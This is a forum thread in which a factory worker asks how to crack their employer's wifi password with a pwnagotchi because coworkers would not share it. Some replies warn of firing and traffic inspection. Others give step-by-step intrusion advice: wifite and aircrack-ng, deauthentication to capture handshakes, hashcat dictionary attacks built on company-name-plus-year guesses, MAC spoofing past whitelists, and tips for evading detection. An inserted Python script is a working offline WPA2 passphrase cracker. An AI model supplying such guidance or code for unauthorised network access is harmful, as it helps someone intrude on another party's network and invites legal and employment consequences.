So I work at a factory. It’s decent work, pays the bills. But I burn through my monthly data in a week from browsing my phone on breaks. I know there’s company wifi all over the building, but it’s intended for the office drones, not the plebs like me on the factory floor.

Some of the guys I’ve worked with knew the password and could use the wifi, but everyone I asked refused to share the password with me. I guess they didn’t want to risk getting in trouble? 🤷‍♂️

Anyway, a while back I learned about these pwnagotchi things, and from what I’ve found it would be exactly what I need to sniff out the password myself. But is this right?

Could someone who knows more about this tell me if I’m on the right track or not? Would this work, or would something else do better?

For the record, I only browse lemmy and a little Facebook at work, I’m not looking to download a bunch of stuff or bring a laptop to game on or anything. Just want to poke around the internet without using all my monthly data.

  • Bubs@lemmy.zip · 19 upvotes · 1 day ago

    Not in a million years would I do this. IT would be able to sniff that out in a heartbeat. Sure, maybe no one will notice for a long while, but the instant you’re found, you’re fired on the spot.

  • frongt@lemmy.zip · 20 upvotes · 1 day ago

    I would never connect my personal devices to a company network. They can inspect your traffic.

  • 413j0@lemmy.dbzer0.com · 2 upvotes · 17 hours ago

    For a simple setup you can do discreetly and without much technical knowledge, try wifite on an old phone running netrunner (Kali for phones) and then crack the password on your home PC. Or, if they have WPS enabled (surprisingly common on shitty corpo office WiFi where I live), the phone might just give you the password directly.

  • black0ut@pawb.social · 7 upvotes · edited · 23 hours ago

    If you can bring your laptop, you can sniff the wifi PSKs with Linux if you have a network card that supports promiscuous mode. After that, you can try to crack the PSKs into the actual password. If it’s simple, or if you have an idea of what it could be, it can be quickly cracked without spending any extra money. This process is basically the same thing the pwnagotchi does, except without all the fluff words and being a bit more manual.

    If your laptop doesn’t have a network card that supports promiscuous mode, you can probably buy an external adapter that works for cheaper than a pwnagotchi.

    If you want something more automated, there’s a suite of tools that can automatically perform the attack for you. It’s called aircrack-ng. You can easily run it with a Kali Linux live USB, which comes with the tool pre-installed. Examples here. And you can get Kali from here.

    It goes without saying, cracking passwords and accessing a password protected network can be illegal in most places, and you should only do it with permission (or at least, don’t get caught). Imho, fuck corporations, so idc if you steal their wifi.

    PD: For the most part, IT probably won’t do anything. Big buildings have hundreds of devices connected, and especially phones on big wifi networks like to change IPs and jump from place to place, so it’s difficult to track a new device. I don’t know about Apple devices, but any relatively new Android device should generate a new MAC address for every new network it connects to. I think you can change that to generate a new MAC every time it connects to a known network, but that’s probably more suspicious than keeping a single MAC.

    PPD: If they’re relatively serious, they will have a MAC whitelist for connecting to the network. In this case, after using the correct password, the AP/router will check your phone’s MAC for a list of allowed ones, and only let you in if it’s there. You can still get inside by sniffing another device’s MAC and impersonating it, Android phones let you manually set a MAC. This will, however, cause conflicts with that other device, so it’s suspicious and will probably get investigated further.

      • black0ut@pawb.social · 1 upvote · 7 hours ago

        WEP was even easier than this, as you could directly sniff the password. This method works with WPA/WPA2, which is what most wifi networks are on.

        • dihutenosa@piefed.social · 1 upvote · 6 hours ago

          Really? ISTR I had to wait until enough traffic accumulates, then run some aircrack-ng computation, to make it happen, on WEP, and WPA was crackproof. Oh well, I must be misremembering, or maybe times have moved on.

          • black0ut@pawb.social · 1 upvote · 5 hours ago

            Both attacks need you to spend a while sniffing traffic, because they want to capture auth frames.

            In the case of WPA, the periodic auth frames aren’t enough to crack the password, so you need a full auth frame. Those full frames get sent when a device connects to the network, and you need to be listening at that same moment in order to catch it (which is why it takes a while). Tools like aircrack-ng can, additionally, do deauth attacks, which temporarily log a target device off the network. This prompts an immediate automatic log in again, that the user doesn’t even notice, but which sends the full auth frame with the PSK.

            Once you have a PSK, you can crack it with john or hashcat (hashcat is faster, because of GPU acceleration). Strong passwords will be uncrackable, but you do have a chance with small or common passwords. With a relatively mid-low range PC, you can easily get millions of hashes per second, making large dictionaries (12B+ passwords) feasible. If you have an idea of what the password could be (name of the company with maybe a year at the end that will probably be within the last 10 years, for example), it’s trivial to check all possible combinations. Bruteforcing is also possible, but it will be limited to 8-9 characters in length (12-13 if only numerical) before becoming unfeasible.
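The two black0ut comments above describe the same pipeline that aircrack-ng and hashcat implement: capture the WPA2 4-way handshake (forcing it with a deauth if needed), then test passphrases offline against the MIC in that handshake. The block below is an added example, not code from the thread or from either tool, that shows why that offline step works and why it is slow. It derives the PMK with PBKDF2-HMAC-SHA1 (4096 iterations, SSID as salt), expands it to the PTK with the 802.11 PRF-512, and checks candidate passphrases against the Key MIC of EAPOL-Key message 2. The SSID, MAC addresses, nonces, passphrase and handshake frame are all constructed inline so it runs offline; nothing here is from a real capture. The candidate generator follows the "company name plus a recent year" idea from the comment above.

```python
import hashlib
import hmac
from typing import Iterable, Optional, Tuple

# Byte offset of the Key MIC field inside an EAPOL-Key frame:
# 4-byte EAPOL header + 1 desc type + 2 key info + 2 key len + 8 replay ctr
# + 32 nonce + 16 IV + 8 RSC + 8 ID = 81
MIC_OFFSET = 81
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32 bytes).
    The 4096 iterations are the only thing rate-limiting an offline cracker."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11 PRF-512 (HMAC-SHA1 based) used for pairwise key expansion.
    Returns the 64-byte PTK; the first 16 bytes are the KCK that signs EAPOL frames."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    label = b"Pairwise key expansion"
    out = b""
    for i in range(4):  # 4 * 20 bytes of SHA1 output, truncated to 64
        out += hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key MIC = HMAC-SHA1(KCK, frame with the MIC field zeroed), truncated to 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol_frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def build_eapol_msg2(snonce: bytes) -> bytes:
    """Minimal EAPOL-Key message 2 (station -> AP) with the MIC field zeroed. Constructed, not captured."""
    body = (
        b"\x02"                   # descriptor type: RSN
        + b"\x01\x0a"             # key info: pairwise, MIC present, descriptor version 2 (HMAC-SHA1/AES)
        + b"\x00\x10"             # key length
        + b"\x00" * 7 + b"\x01"   # replay counter
        + snonce                  # key nonce (SNonce)
        + b"\x00" * 16            # key IV
        + b"\x00" * 8             # key RSC
        + b"\x00" * 8             # key ID
        + b"\x00" * MIC_LEN       # MIC, filled in by the station
        + b"\x00\x00"             # key data length
    )
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def sign_msg2(passphrase: str, ssid: str, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """What the legitimate station does: derive KCK from the real passphrase and fill in the MIC."""
    frame = build_eapol_msg2(snonce)
    kck = prf512(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + MIC_LEN:]


Handshake = Tuple[str, bytes, bytes, bytes, bytes, bytes]  # ssid, ap_mac, sta_mac, anonce, snonce, eapol msg2


def crack(handshake: Handshake, candidates: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: recompute the MIC for each candidate and compare to the captured one."""
    ssid, ap_mac, sta_mac, anonce, snonce, eapol = handshake
    captured_mic = eapol[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for cand in candidates:
        kck = prf512(pmk_from_passphrase(cand, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol), captured_mic):
            return cand
    return None


def company_year_candidates(base_words: Iterable[str], years: Iterable[int]) -> Iterable[str]:
    """'Company name, maybe with a year on the end' keyspace from the comment above."""
    years = list(years)
    for w in base_words:
        yield w
        for y in years:
            yield f"{w}{y}"
            yield f"{w}{y % 100:02d}"


# --- constructed sample handshake (assumed names and values, not a real capture) ---
SSID = "AcmeFactory-Office"
AP_MAC = bytes.fromhex("0a1b2c3d4e5f")
STA_MAC = bytes.fromhex("a0b1c2d3e4f5")
ANONCE = bytes(range(32))
SNONCE = bytes(range(100, 132))
REAL_PASSPHRASE = "AcmeFactory2019"  # what the station knows; the cracker only sees the MIC
CAPTURED_MSG2 = sign_msg2(REAL_PASSPHRASE, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE)
HANDSHAKE: Handshake = (SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, CAPTURED_MSG2)
BASE_WORDS = ["password", "acmefactory", "AcmeFactory", "Acme"]

if __name__ == "__main__":
    found = crack(HANDSHAKE, company_year_candidates(BASE_WORDS, range(2015, 2026)))
    print("recovered passphrase:", found)
```

Everything after the capture runs against the handshake bytes alone, which is why the cracking step generates no traffic the network could see; only the capture and any deauth are observable. The cost per candidate is one PBKDF2 (4096 HMAC-SHA1 rounds) plus a handful of HMACs, which is what caps a CPU at tens of thousands of guesses per second and makes hashcat on a GPU the tool of choice for big dictionaries. A long random passphrase, or 802.1X/EAP-TLS as caseyweederman describes below, has no MIC worth cracking.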

  • lurch (he/him)@sh.itjust.works · 5 upvotes · 22 hours ago

    I’d say call front desk and let them patch you to IT support.

    Also, btw my company has only guest wifi. (Workstations use wired LAN.) It’s not connected to the actual company network. It’s for visitors/customers, so they can use their notebooks/tablets while negotiating deals etc… It can also be used to do things like that, as long as it doesn’t interfere with customers.

  • caseyweederman@lemmy.ca · 4 upvotes · 24 hours ago

    Wi-Fi is likely cert-based, certificates being managed by mobile device management on managed devices.
    No password to sniff.
    In the off chance it’s not:
    An alert pops up in a dashboard immediately. You lose your job.
    Just kidding, the lowest-bidder network security team your factory pays is full of people who have only been there for a few months and either don’t know what to do or don’t care.